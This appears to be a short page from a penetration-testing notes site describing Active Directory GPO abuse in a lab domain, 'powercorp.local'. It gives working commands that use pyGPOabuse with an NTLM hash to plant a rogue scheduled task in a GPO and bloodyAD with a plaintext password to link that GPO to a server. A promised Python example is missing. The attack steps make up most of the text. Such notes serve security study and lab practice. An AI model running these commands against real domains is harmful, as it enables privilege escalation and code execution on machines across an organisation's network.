GPO (Group Policy Object)

When you own a object that owns a GPO, you can write to the GPO and link it in the domain.

Creating a rogue task for the GPO

  • You will need to find the GPO id (can be found in bloodhound)

  • You will need credentials for the user that controls the GPO

Using pyGPOabuse we can create a task for the GPO:

python3 pygpoabuse.py powercorp.local/incendium -hashes :F0529918A0DE5B5B71AB9BBD915B1B01 -gpo-id 'D693F1E4-5666-4259-8BF1-E43CCE1D56F9' -f

Linking GPO

Now that we created a rogue task, we also need to link the GPO to objects. We can do this by remotely by using a Python3 script for example:

Or we can use BloodyAD:

bloodyAD -d powercorp.local --host 10.10.1.128 -u incendium -p Incendium123 set object SRV01$ GPLink -v CN={2AADC2C9-C75F-45EF-A002-A22E1893FDB5},CN=POLICIES,CN=SYSTEM,DC=POWERCORP,DC=LOCAL

Last updated